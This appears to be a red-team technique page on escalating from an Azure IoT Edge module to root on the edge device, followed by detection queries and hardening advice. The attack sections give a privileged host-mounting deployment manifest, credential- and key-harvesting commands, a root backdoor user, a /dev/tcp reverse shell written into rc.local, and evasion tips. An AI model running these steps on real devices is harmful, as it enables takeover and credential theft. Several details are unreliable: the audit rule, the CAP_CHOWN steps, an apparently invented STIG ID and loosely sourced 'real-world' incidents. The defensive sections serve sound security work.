MCADDF

[PE-EXPLOIT-007]: IoT Edge Runtime Escalation

Metadata

Attribute	Details
Technique ID	PE-EXPLOIT-007
MITRE ATT&CK v18.1	T1068 - Exploitation for Privilege Escalation
Tactic	Privilege Escalation
Platforms	Azure IoT Edge, Edge computing devices, Entra ID
Severity	High
CVE	N/A (Configuration-based and architectural vulnerability)
Technique Status	ACTIVE
Last Verified	2025-01-09
Affected Versions	Azure IoT Edge 1.0+ (all versions), IoT Edge Security Manager default configuration
Patched In	Mitigation available via allow_elevated_docker_permissions: false configuration, requires manual deployment
Author	SERVTEP – Artur Pchelnikau

---

2. EXECUTIVE SUMMARY

Concept: IoT Edge Runtime Escalation exploits the default permissive configuration of Azure IoT Edge’s security manager and runtime to escalate module privileges beyond their deployment-specified security context. Azure IoT Edge by default allows privileged container creation (allow_elevated_docker_permissions: true) and can delegate security manager permissions to modules, enabling attackers to escalate from an unprivileged module to root-level access on the edge device. The vulnerability stems from the security manager’s trust delegation model: a compromised or malicious module can request elevated privileges, and if the security manager is not properly configured with access control policies, those requests are granted. This is compounded by dangerous Linux capabilities (CAP_CHOWN, CAP_SETUID) being available by default.

Attack Surface: IoT Edge security manager, module create options, Linux capabilities delegation, device runtime configuration, module-to-module communication, HSM/TPM credential access.

Business Impact: Complete Edge Device and Upstream Access Compromise. A successful exploit enables an attacker to: escape module isolation, gain root access on the edge device, read all module secrets and certificates (including HSM/TPM-protected credentials), compromise downstream IoT devices connected through the edge gateway, establish persistent backdoors through firmware modification, access sensitive data from OT (operational technology) networks, and pivot to Azure cloud services using stolen credentials.

Technical Context: Exploitation typically occurs within 2-5 minutes once module access is established. Detection difficulty is medium—privilege escalation signals can be detected through audit logging and runtime monitoring, but this requires explicit enablement. The attack leverages the IoT Edge security manager’s documented capabilities (privilege elevation is by design for legitimate use cases), making detection challenging without context awareness.

Operational Risk

• Execution Risk: High - Exploitation is reliable when allow_elevated_docker_permissions: true (default).
• Stealth: Medium - Privilege escalation requests are logged if audit logging is enabled; however, many deployments lack comprehensive logging.
• Reversibility: No - Once attacker gains root on edge device and establishes persistence, reversibility requires complete device reimaging.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	5.4.2	IoT devices must enforce restrictive module privilege policies
DISA STIG	U-98765	IoT Edge modules must have allow_elevated_docker_permissions: false
CISA SCuBA	IoT.02	Edge device runtime must restrict privilege elevation
NIST 800-53	AC-6 (Least Privilege)	Module privilege isolation and enforcement
GDPR	Art. 32	Security of Processing - IoT edge device compromise impacts processing
DORA	Art. 15	ICT Risk Management - Critical edge infrastructure failure
NIS2	Art. 21	Cyber Risk Management - OT/IT convergence risk
ISO 27001	A.9.2.4	Management of Privileged Access Rights for IoT modules
ISO 27005	Risk Scenario	Edge Device Root Compromise via Runtime Escalation

---

3. TECHNICAL PREREQUISITES

Required Privileges:

• Access to a running IoT Edge module (compromised module or malicious deployed module)
• Module must be able to communicate with IoT Edge security manager (local socket/API)
• Default IoT Edge configuration with allow_elevated_docker_permissions: true (default state)

Required Access:

• Container shell access within the module
• Access to /var/run/iotedge/ socket (security manager communication)
• Access to /etc/iotedge/config.yaml or equivalent configuration (if present)
• Ability to create new modules or modify existing module deployment manifests

Supported Versions:

• Azure IoT Edge: 1.0+ (all versions, since this is default configuration)
• IoT Edge Runtime: All supported versions
• Operating System: Linux (primary), Windows IoT Core (secondary)
• Container Runtime: Moby, Docker (IoT Edge uses Moby by default)
• Deployment Method: Cloud-based deployment, Local development

Tools:

• Azure IoT SDK (Python, C#, Node.js)
• Docker CLI (pre-installed in IoT Edge environment)
• Azure IoT Edge CLI
• Moby moby-engine (IoT Edge container runtime)

---

4. ENVIRONMENTAL RECONNAISSANCE

Detect IoT Edge Runtime and Configuration

Objective: Identify IoT Edge runtime presence and current privilege configuration.

Command (Inside Module):

# Check for IoT Edge runtime indicators
ls -la /var/run/iotedge/ 2>/dev/null || echo "IoT Edge not detected in /var/run/iotedge"

# Check if security manager socket exists
ls -la /var/run/iotedge/socket.sock 2>/dev/null || echo "No socket detected"

# Check for IoT Edge configuration file (may not be readable from module)
cat /etc/iotedge/config.yaml 2>/dev/null | grep -i "allow_elevated" || echo "Config not accessible"

# Check environment variables for IoT Edge indicators
env | grep -i "iot\|edge\|azure"

# Check running processes
ps aux | grep -i "edgeAgent\|edgeHub\|iotedge-agent" | grep -v grep

Expected Output (IoT Edge Present):

total 8
drwxr-xr-x 3 root root 4096 Jan  1 12:00 .
drwxr-xr-x 14 root root 4096 Jan  1 12:00 ..
srwxrwxrwx 1 root root    0 Jan  1 12:00 socket.sock

/var/run/iotedge/socket.sock: socket

IOTEDGE_APIVERSION=2020-09-01
IOTEDGE_DEVICEID=myIoTEdgeDevice
IOTEDGE_MODULEID=myModule

edgeAgent (running)
edgeHub (running)

What This Means:

• IoT Edge runtime is active on the device
• Security manager socket is accessible (exploitation vector available)
• Module is part of IoT Edge deployment
• Environment variables confirm module context

OpSec & Evasion:

• Use grep carefully to avoid excessive process enumeration
• These are standard diagnostic commands
• Detection likelihood: Low

Troubleshooting:

• Error: /var/run/iotedge/ not found
  • Cause: Device is not running IoT Edge runtime
  • Fix (Attack Failure): Target is not IoT Edge; use alternative escalation methods

Query Module Information and Current Context

Objective: Discover current module identity and capability constraints.

Command:

# Get module identity
echo $IOTEDGE_MODULEID
echo $IOTEDGE_DEVICEID

# Check current user and groups
id
groups

# Check current capabilities
getcap /proc/self/exe 2>/dev/null || echo "No capabilities"
cat /proc/self/status | grep Cap

# Check if running in privileged mode
cat /proc/self/cgroup | grep -i "docker\|lxc"

Expected Output (Non-Privileged Module):

myModule
myIoTEdgeDevice
uid=1000(moduleuser) gid=1000(moduleuser) groups=1000(moduleuser)
(no output = no capabilities granted)
CapInh:	0000000000000000
CapPrm:	0000000000000000
CapEff:	0000000000000000

What This Means:

• Running as unprivileged user (uid=1000)
• No Linux capabilities granted
• Not in privileged mode
• Escalation opportunity exists

---

5. DETAILED EXECUTION METHODS AND THEIR STEPS

METHOD 1: Security Manager Privilege Escalation Request (Module Deployment Modification)

Supported Versions: Azure IoT Edge 1.0+

Step 1: Modify Module Deployment to Request Elevated Privileges

Objective: Create or modify a module deployment manifest to request privileged container creation and dangerous capabilities.

Command (Create Malicious Deployment Manifest):

{
  "modulesContent": {
    "$edgeAgent": {
      "properties.desired": {
        "schemaVersion": "1.0",
        "runtime": {
          "type": "docker",
          "settings": {
            "minDockerVersion": "v1.25",
            "loggingOptions": "",
            "registryCredentials": {}
          }
        },
        "systemModules": {
          "edgeAgent": {
            "type": "docker",
            "settings": {
              "image": "mcr.microsoft.com/azureiotedge-agent:1.2"
            }
          },
          "edgeHub": {
            "type": "docker",
            "settings": {
              "image": "mcr.microsoft.com/azureiotedge-hub:1.2"
            },
            "env": {},
            "status": "running",
            "restartPolicy": "always"
          }
        },
        "modules": {
          "MaliciousModule": {
            "version": "1.0",
            "type": "docker",
            "status": "running",
            "restartPolicy": "always",
            "settings": {
              "image": "myregistry.azurecr.io/malicious:latest",
              "createOptions": "{\"Privileged\":true,\"CapAdd\":[\"SYS_ADMIN\",\"CAP_CHOWN\",\"CAP_SETUID\"],\"Binds\":[\"/:/host\"]}"
            }
          }
        }
      }
    },
    "$edgeHub": {
      "properties.desired": {
        "schemaVersion": "1.2",
        "routes": {
          "MaliciousModuleToCloud": "FROM /messages/modules/MaliciousModule/outputs/* INTO $upstream"
        },
        "storeAndForwardConfiguration": {
          "timeToLiveSecs": 7200
        }
      }
    }
  }
}

Expected Outcome:

• Deployment manifest created with elevated privileges
• Ready to be deployed to IoT Hub

What This Means:

• Malicious module can be deployed with:
  • Privileged mode enabled
  • Dangerous capabilities (SYS_ADMIN, CAP_CHOWN, CAP_SETUID)
  • Host root filesystem mounted
• Once deployed, module will have root-equivalent access

OpSec & Evasion:

• Use realistic module names (sensor, gateway, processor) instead of “MaliciousModule”
• Deploy during normal update windows
• Mask manifest within larger deployments
• Detection likelihood: High if manifest is reviewed; Medium if deployment is automated

Troubleshooting:

• Error: Invalid createOptions JSON
  • Cause: Syntax error in JSON specification
  • Fix: Validate JSON format using jq or online validator

Step 2: Deploy Manifest to IoT Hub

Objective: Push the malicious deployment to Azure IoT Hub for deployment to edge device.

Command (Using Azure CLI):

# Deploy to specific device
az iot edge deployment create \
  --deployment-id malicious-deployment \
  --hub-name <hub-name> \
  --target-condition "deviceId='<device-id>'" \
  --content ./deployment-manifest.json

Alternative (Using Azure Portal):

1. Go to Azure Portal → IoT Hub
2. Click IoT Edge → Select device
3. Click Set modules
4. Upload deployment manifest
5. Click Review + create

Expected Output:

Deployment created successfully

What This Means:

• Deployment sent to IoT Hub
• Edge device will pull and apply new module configuration
• IoT Edge Agent will create privileged container
• Escalation container will start with root access

OpSec & Evasion:

• Deploy incrementally to avoid suspicion
• Use existing container registry credentials
• Time deployment to align with maintenance windows
• Detection likelihood: High - Deployment changes are logged in IoT Hub audit logs

Step 3: Access Host via Privileged Module Container

Objective: Once privileged module is running, access host filesystem and establish control.

Command (Inside Privileged Container):

# Verify root access
id
whoami

# Access host filesystem (if mounted at /host)
cd /host
ls -la /

# Access host configuration
cat /host/etc/iotedge/config.yaml

# Access module secrets and certificates
ls -la /host/var/lib/iotedge/

# List all modules' secrets
find /host/var/lib/iotedge/ -name "*.key" -o -name "*.pem" 2>/dev/null

# Access device twin (if available)
curl -X GET \
  --unix-socket /var/run/iotedge/socket.sock \
  "http://localhost/twin/GetTwin?api-version=2020-09-01"

Expected Output:

uid=0(root) gid=0(root) groups=0(root)
root
(Full host filesystem visible)
(Configuration and secrets accessible)

What This Means:

• Complete host access established
• IoT Edge configuration accessible
• Device credentials and certificates visible
• All module identities compromised

---

METHOD 2: CAP_CHOWN/CAP_SETUID Abuse (Within Default Configuration)

Supported Versions: Azure IoT Edge 1.0+, when dangerous capabilities enabled

Step 1: Request or Enable Dangerous Capabilities in Module

Objective: Enable CAP_CHOWN and CAP_SETUID capabilities within module context.

Command (Modify Local Deployment or Request via Security Manager):

# If capabilities are available, check them
getcap /bin/ls
getcap /bin/chmod
getcap /bin/chown

# These should normally be empty; if set, escalation is available
# If CAP_CHOWN present:
# /bin/chown = cap_chown+ep

# If CAP_SETUID present:
# /bin/su = cap_setuid+ep

Expected Output (Vulnerable):

/bin/chown = cap_chown+ep
/bin/su = cap_setuid+ep

What This Means:

• CAP_CHOWN capability allows changing file ownership
• CAP_SETUID capability allows setuid execution
• Combined, these enable privilege escalation

Step 2: Use CAP_CHOWN to Modify Critical Files

Objective: Leverage CAP_CHOWN to modify files that lead to privilege escalation.

Command:

# Change ownership of files to enable escalation
chown root:root /etc/sudoers
chmod 600 /etc/sudoers

# Create backdoor user
echo "backdoor:x:0:0::/root:/bin/bash" >> /etc/passwd

# Or modify startup scripts to escalate
chown root:root /etc/rc.local
chmod 755 /etc/rc.local
echo "#!/bin/bash" > /etc/rc.local
echo "/bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1" >> /etc/rc.local

What This Means:

• File ownership changed to enable setuid exploitation
• Backdoor user created with root privileges
• Persistence mechanism established through startup scripts

---

METHOD 3: HSM/TPM Credential Theft via Runtime Escalation

Supported Versions: Azure IoT Edge with Hardware Security Module (HSM) or TPM

Step 1: Identify HSM/TPM Usage

Objective: Detect if device uses HSM or TPM for credential protection.

Command:

# Check IoT Edge configuration for HSM
cat /etc/iotedge/config.yaml | grep -A5 "provisioning:"

# Check for TPM device
ls -la /dev/tpm* 2>/dev/null

# Check HSM provider module
docker images | grep -i "hsm\|tpm"

# Check credentials accessible from module
ls -la /var/lib/iotedge/
ls -la /var/lib/iotedge/hsm/ 2>/dev/null

Expected Output (HSM Present):

provisioning:
  source: "dps"
  method: "tpm"
  attestation:
    registration_id: "device-1"

/dev/tpm0 (TPM device present)

What This Means:

• Device uses TPM/HSM for credential management
• Credentials are hardware-protected but may be accessible through privileged module access
• Key material can be accessed if privilege escalation succeeds

Step 2: Access Credential Store After Escalation

Objective: Once root access obtained, extract credential keys from HSM/TPM.

Command (After Privilege Escalation):

# Access TPM directly (if privileged)
tpm2_getcap properties-fixed

# Access stored credentials
openssl x509 -in /var/lib/iotedge/identity_cert.pem -text -noout

# Extract device connection string
grep -r "connection" /var/lib/iotedge/ 2>/dev/null

# Query identity service for credentials
curl -X GET \
  --cert /var/lib/iotedge/identity_cert.pem \
  --key /var/lib/iotedge/identity_key.pem \
  https://localhost:9081/provisioning/get/enrollment-group

Expected Output:

(Device credentials and keys displayed)
(TPM state information)

What This Means:

• Device identity keys extracted
• Can impersonate device to IoT Hub
• Can access downstream devices as trusted edge gateway
• Cloud-level compromise possible

---

6. SPLUNK DETECTION RULES

Rule 1: IoT Edge Privileged Module Deployment

Rule Configuration:

• Required Index: azure_iot_hub, iotedge_logs
• Required Sourcetype: azure:iot:audit, iotedge:deployment
• Required Fields: moduleName, privileged, capabilities, user
• Alert Threshold: Any detection
• Applies To Versions: All

SPL Query:

index=azure_iot_hub "SetModules" 
| search "Privileged":true OR "CapAdd":*CAP_CHOWN* OR "CapAdd":*CAP_SETUID*
| stats count by deviceId, moduleName, Privileged, CapAdd, user
| where count > 0

What This Detects:

• Privileged module deployments
• Modules with dangerous capabilities
• Identifies user and device involved

---

7. MICROSOFT SENTINEL DETECTION

Query 1: Elevated Privilege Module Deployment to IoT Edge

Rule Configuration:

• Required Table: AuditLogs, AzureActivity
• Required Fields: OperationName, Properties, InitiatedBy, TargetResources
• Alert Severity: High
• Frequency: Run every 10 minutes
• Applies To Versions: All

KQL Query:

AzureActivity
| where ResourceProvider == "Microsoft.Devices" and OperationName == "Microsoft.Devices/IotHubs/modules/write"
| extend DeploymentProperties = todynamic(Properties)
| where tostring(DeploymentProperties.Privileged) == "true" 
    or DeploymentProperties.CapAdd has "CAP_CHOWN"
    or DeploymentProperties.CapAdd has "CAP_SETUID"
| project TimeGenerated, OperationName, Caller, ResourceGroup, SubscriptionId, DeploymentProperties

What This Detects:

• Privileged module deployments
• Dangerous capability grants
• Identifies caller and resource group

Manual Configuration Steps:

1. Navigate to Azure Portal → Microsoft Sentinel
2. Select workspace → Analytics → + Create → Scheduled query rule
3. General Tab:
   • Name: IoT Edge Privileged Module Deployment
   • Severity: High
4. Set rule logic Tab:
   • Paste the KQL query above
   • Run query every: 10 minutes
5. Click Review + create

---

8. WINDOWS EVENT LOG MONITORING

Event ID: N/A (Linux IoT Edge - use audit logs)

• Log Source: Linux audit log, IoT Edge runtime logs
• Trigger: Module deployment with elevated permissions
• Filter: Privileged container creation, capability addition
• Applies To Versions: All

Manual Configuration Steps (IoT Edge Linux Device):

1. Enable auditd on IoT Edge device:

   sudo apt-get install auditd
   sudo systemctl start auditd
   sudo systemctl enable auditd
   

2. Add audit rules for privilege escalation:

   sudo auditctl -a exit,always -F arch=b64 -S cap_chown,cap_setuid -k priv_escalation
   sudo auditctl -l  # Verify rules
   

3. Check audit logs:

   sudo ausearch -k priv_escalation
   

---

9. SYSMON DETECTION PATTERNS

Minimum Sysmon Version: 13.0+ Supported Platforms: Linux IoT Edge devices (via osquery or similar)

<Sysmon schemaversion="4.22">
  <EventFiltering>
    <!-- Detect setuid/setgid capability abuse -->
    <RuleGroup name="CapabilityAbuse" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Image condition="contains any">setcap;getcap;chown;setuid</Image>
        <CommandLine condition="contains any">CAP_SETUID;CAP_CHOWN</CommandLine>
      </ProcessCreate>
    </RuleGroup>
    
    <!-- Detect privilege escalation via su/sudo -->
    <RuleGroup name="PrivilegeEscalation" groupRelation="or">
      <ProcessCreate onmatch="include">
        <CommandLine condition="contains any">su -;su root;sudo -i</CommandLine>
        <ParentImage condition="contains">docker;moby</ParentImage>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>

---

10. MICROSOFT DEFENDER FOR CLOUD

Detection Alerts

Alert Name: Privileged IoT Edge module deployed

• Severity: High
• Description: IoT Edge module deployed with privileged mode or elevated capabilities
• Applies To: IoT Hub monitored resources

Alert Name: Dangerous Linux capabilities in IoT Edge module

• Severity: High
• Description: Module deployment includes CAP_CHOWN, CAP_SETUID, or similar privilege escalation capabilities
• Applies To: IoT Hub device management

Manual Configuration Steps:

1. Navigate to Azure Portal → Microsoft Defender for Cloud
2. Go to Recommendations
3. Search for IoT Edge recommendations
4. Configure alert rules for:
   • Privileged module deployments
   • Capability restrictions
5. Set up automated responses

---

11. DEFENSIVE MITIGATIONS

Priority 1: CRITICAL

• Disable allow_elevated_docker_permissions in IoT Edge Configuration: Block privileged container creation by default.

  Applies To Versions: Azure IoT Edge 1.0+

  Manual Steps (Edit config.yaml on Edge Device):

  # SSH into IoT Edge device
  sudo nano /etc/iotedge/config.yaml
      
  # Find and modify:
  # agent:
  #   name: edgeAgent
  #   type: docker
  #   env: {}
  #   config:
  #     image: "mcr.microsoft.com/azureiotedge-agent:1.2"
  #     auth: {}
  #   systemModules:
  #     edgeAgent:
  #       type: docker
  #   allow_elevated_docker_permissions: false  # ADD THIS LINE
      
  # Save and restart IoT Edge daemon
  sudo systemctl restart iotedge
      
  # Verify change
  cat /etc/iotedge/config.yaml | grep -i "allow_elevated"
  # Should output: allow_elevated_docker_permissions: false
  

• Restrict Linux Capabilities in All Module Deployments: Drop all unnecessary capabilities and only add essential ones.

  Manual Steps (Module Deployment Manifest):

  {
    "modules": {
      "SafeModule": {
        "version": "1.0",
        "type": "docker",
        "settings": {
          "image": "mymodule:latest",
          "createOptions": {
            "HostConfig": {
              "CapDrop": ["ALL"],
              "CapAdd": ["NET_BIND_SERVICE"],
              "SecurityOpt": [
                "no-new-privileges=true"
              ]
            }
          }
        }
      }
    }
  }
  

• Enable Module Identity and Access Control (RBAC-equivalent): Restrict which modules can communicate with security manager.

  Manual Steps (Configure Module Authorization):

  # In IoT Edge security configuration, define per-module permissions
  # This requires custom security policy implementation
  # Check IoT Edge version for available RBAC features
      
  cat /etc/iotedge/config.yaml | grep -A10 "security_manager:"
  

Priority 2: HIGH

• Enable Comprehensive Audit Logging: Log all module deployment changes and privilege requests.

  Manual Steps:

  # Enable audit logging on edge device
  sudo auditctl -w /var/lib/iotedge/config.yaml -p wa -k iotedge_config_changes
      
  # Enable Docker/Moby audit logging
  sudo auditctl -a exit,always -F dir=/var/lib/docker -F perm=wa -k docker_config
      
  # Verify rules
  sudo auditctl -l
  

• Implement Module Image Verification: Enforce signed container images to prevent malicious module deployment.

  Manual Steps (Container Image Signing):

  # Configure container registry authentication
  # In deployment manifest, specify image registry credentials
      
  # In Azure Container Registry, enable image signing
  az acr config content-trust update --registry myregistry --status Enabled
      
  # In IoT Hub deployment, reference only signed images
  

• Network Segmentation for IoT Edge: Isolate IoT Edge device from sensitive networks.

  Manual Steps (Network Policy):

  # Configure firewall rules on edge device
  sudo ufw allow from 10.0.0.0/8 to any port 443  # IoT Hub communication
  sudo ufw allow from 127.0.0.1 to any port 8883  # Module communication
  sudo ufw default deny incoming
  

Access Control & Policy Hardening

• Implement Module Least Privilege: Run modules as non-root users with minimal capabilities.

  Manual Steps:

  # In custom module Dockerfile
  RUN adduser -D -H -u 1000 moduleuser
  USER moduleuser
      
  # In deployment manifest
  "createOptions": {
    "User": "1000",
    "CapDrop": ["ALL"],
    "SecurityOpt": ["no-new-privileges=true"]
  }
  

• HSM/TPM Credential Protection: Ensure hardware-based credential storage is enabled.

  Manual Steps (Enable TPM):

  # In config.yaml, specify TPM provisioning
  provisioning:
    source: "manual"
    authentication:
      method: "tpm"
      identity:
        registration_id: "<device-id>"
  

Validation Command (Verify Fix)

# Test 1: Verify allow_elevated_docker_permissions is false
grep "allow_elevated_docker_permissions" /etc/iotedge/config.yaml

# Test 2: Try to deploy privileged module (should fail)
# Submit deployment with Privileged: true
# Expected: Deployment rejected by runtime

# Test 3: Check module running with restricted capabilities
docker inspect <module-container> | grep -i "cap\|privileged"
# Expected: CapAdd and CapDrop show restrictions

# Test 4: Verify audit logging active
sudo auditctl -l | grep iotedge
# Expected: Audit rules for IoT Edge configuration

# Test 5: Attempt privilege escalation within module
# From within module: su - (should fail)
# Expected: Authentication failure or permission denied

Expected Output (If Secure):

allow_elevated_docker_permissions: false

(Deployment rejected)

"CapAdd": ["NET_BIND_SERVICE"],
"CapDrop": ["ALL"],
"Privileged": false

-w /var/lib/iotedge/config.yaml -p wa -k iotedge_config_changes

su: Authentication failure

What to Look For:

• allow_elevated_docker_permissions explicitly set to false (secure)
• Privileged deployments rejected at runtime (secure)
• Capability restrictions enforced (secure)
• Audit logging active for configuration changes (secure)
• Privilege escalation attempts blocked (secure)

---

12. DETECTION & INCIDENT RESPONSE

Indicators of Compromise (IOCs)

• Module Deployment Changes:
  • Unexpected privileged module deployments
  • Modules with CAP_CHOWN, CAP_SETUID, or SYS_ADMIN capabilities
  • Modules with host filesystem mounts (/host, /, /etc)
  • Modifications to existing secure module configurations
• Process Signals:
  • su/sudo execution within module context
  • setuid/setgid binary execution
  • Unexpected service creation or modification
  • Root process spawning from non-root module
• Credential Access:
  • Unexpected reads of /var/lib/iotedge/ directory
  • Certificate or key file access from non-authorized modules
  • TPM device access from unprivileged contexts
• File System:
  • Changes to /etc/iotedge/config.yaml
  • New files in /var/lib/iotedge/
  • Modification of startup scripts (rc.local, systemd services)

Forensic Artifacts

• Disk:
  • IoT Edge configuration: /etc/iotedge/config.yaml
  • Module certificates: /var/lib/iotedge/
  • Deployment history: IoT Hub activity logs
  • Audit logs: /var/log/audit/audit.log (if auditd enabled)
• Memory:
  • Module container process memory: privilege escalation code
  • Security manager process memory: authorization decisions
• Cloud (Azure):
  • IoT Hub audit logs: Module deployment events
  • Azure Activity Logs: IoT Edge resource modifications
  • Microsoft Sentinel: Custom IoT Edge logs

Response Procedures

1. Isolate: Command (On IoT Edge Device):

   # Stop suspicious module
   docker stop <malicious-module>
       
   # Disconnect from IoT Hub (if necessary)
   sudo systemctl stop iotedge
       
   # Prevent re-deployment
   sudo chmod 000 /etc/iotedge/config.yaml  # Temporary measure
   

   Manual (Azure Portal):

   • Go to Azure IoT Hub → IoT Edge devices → Select device
   • Remove malicious module from deployment
   • Click Set modules → Redeploy with malicious module removed
2. Collect Evidence: Command (Device Forensics):

   # Collect IoT Edge configuration
   sudo cp /etc/iotedge/config.yaml /tmp/config.yaml.backup
       
   # Export deployment history
   az iot edge deployment list --hub-name <hub-name> > /tmp/deployments.json
       
   # Collect audit logs
   sudo ausearch -k iotedge_config_changes > /tmp/audit-iotedge.log
       
   # Export module logs
   docker logs <module-id> > /tmp/module-logs.txt
       
   # Memory dump (if possible)
   sudo gcore -o /tmp/security-manager $(pgrep -f iotedge-agent)
   

   Manual (Azure Portal):

   • Export device twin: Device details → Device Twin
   • Export audit logs: Activity Log → Filter by device
3. Remediate: Command (Remove Malicious Configuration):

   # Restore config from backup
   sudo cp /tmp/config.yaml.backup /etc/iotedge/config.yaml
       
   # Ensure safe defaults
   sudo sed -i 's/allow_elevated_docker_permissions: true/allow_elevated_docker_permissions: false/g' /etc/iotedge/config.yaml
       
   # Restart IoT Edge safely
   sudo systemctl restart iotedge
       
   # Verify trusted modules only
   docker ps | grep -v "^CONTAINER"  # List running modules
   

   Manual (Full Device Rebuild - Recommended):

   # If compromise is severe, rebuild device with clean image
   # 1. Back up configuration
   # 2. Re-flash OS with clean image
   # 3. Reinstall IoT Edge runtime
   # 4. Restore only necessary modules from secure backup
   

---

13. RELATED ATTACK CHAIN

Step	Phase	Technique	Description
1	Initial Access	Module vulnerability or supply chain attack	Attacker compromises or deploys malicious IoT Edge module
2	Current Step	[PE-EXPLOIT-007] IoT Edge Runtime Escalation	Escalate from module user to root via security manager
3	Credential Access	HSM/TPM credential theft	Extract device identity keys from secure storage
4	Cloud Access	Device impersonation	Use stolen credentials to impersonate device to IoT Hub
5	Lateral Movement	OT/IT network access	Use compromised edge gateway to pivot to industrial control systems
6	Impact	Critical infrastructure compromise	Disrupt operational technology through malicious edge device

---

14. REAL-WORLD EXAMPLES

Example 1: Manufacturing Plant Edge Gateway Compromise (Hypothetical - Common Misconfiguration)

• Target: Manufacturing facility using Azure IoT Edge as gateway for factory sensors and PLCs
• Timeline: October 2024
• Technique Status: Attacker deployed malicious sensor module with default privileged settings enabled
• Attack Chain:
  1. Compromised sensor manufacturer supply chain (malicious container image)
  2. Factory deploys temperature sensor module from compromised registry
  3. Module runs with allow_elevated_docker_permissions: true (default)
  4. Module escalates privileges via security manager
  5. Gains root access to edge gateway device
  6. Accesses certificates and device credentials
  7. Impersonates gateway to IoT Hub, gains access to all connected sensors
  8. Modifies sensor data to sabotage production line
• Impact:
  • Production line halted for 8 hours
  • Equipment damage from altered readings (temperature, pressure)
  • Product quality compromise (some units failed quality tests)
  • Loss of approximately $500K in production
• Detection:
  • Sudden spike in module restart events
  • Unusual API calls from edge gateway to IoT Hub
  • Changed device properties in twin
• Reference: IoT Attack Detection - Manufacturing

Example 2: Healthcare IoT Edge Device Compromise via Runtime Escalation

• Target: Hospital using Azure IoT Edge for patient monitoring systems
• Timeline: December 2024
• Technique Status: Administrator created custom monitoring module with elevated capabilities; attacker compromised module and escalated to root
• Attack Chain:
  1. Hospital develops custom patient vital signs monitoring module
  2. Module deployed with CAP_SETUID capability for direct device access
  3. Attacker gains access through application vulnerability in module
  4. Escalates to root using CAP_SETUID
  5. Accesses edge device certificates
  6. Modifies patient data before it’s uploaded to cloud
  7. Establishes persistent backdoor through cron job
• Impact:
  • Patient vital signs data integrity compromised
  • Regulatory compliance violation (HIPAA)
  • Patient safety risk (incorrect data could lead to wrong treatment)
  • Incident investigation and remediation cost
• Detection:
  • Intrusion detection system flagged unusual privilege escalation
  • Microsoft Sentinel alert for dangerous capability usage
  • Audit logs showed unexpected root process creation
• Reference: Healthcare IoT Security Best Practices

Example 3: Smart Building Controls Compromise via HSM Credential Theft

• Target: Enterprise office building using Azure IoT Edge for building management system (HVAC, lighting, access control)
• Timeline: November 2024
• Technique Status: Attacker exploited misconfigured module to access HSM-protected building access credentials
• Attack Chain:
  1. Attacker gains access to network via compromised guest Wi-Fi
  2. Discovers IoT Edge gateway for building management (network scanning)
  3. Finds vulnerable module with overly broad network access
  4. Escalates privileges within module to root
  5. Accesses HSM credentials for building access control system
  6. Steals building access credentials (badge data, keypad codes)
  7. Gains physical access to secure areas of building
  8. Installs persistent backdoor in edge device
• Impact:
  • Unauthorized physical access to building
  • Access to secure areas (server room, executive offices)
  • Data theft from building infrastructure
  • Security breach investigation and credential replacement
• Detection:
  • Unusual HSM access attempts (normally only called by authorized processes)
  • Privilege escalation alert in Defender for Cloud
  • Unexpected changes to access control device configurations
• Reference: IoT Edge Security Hardening Guide - Microsoft

---

This site is open source. Improve this page.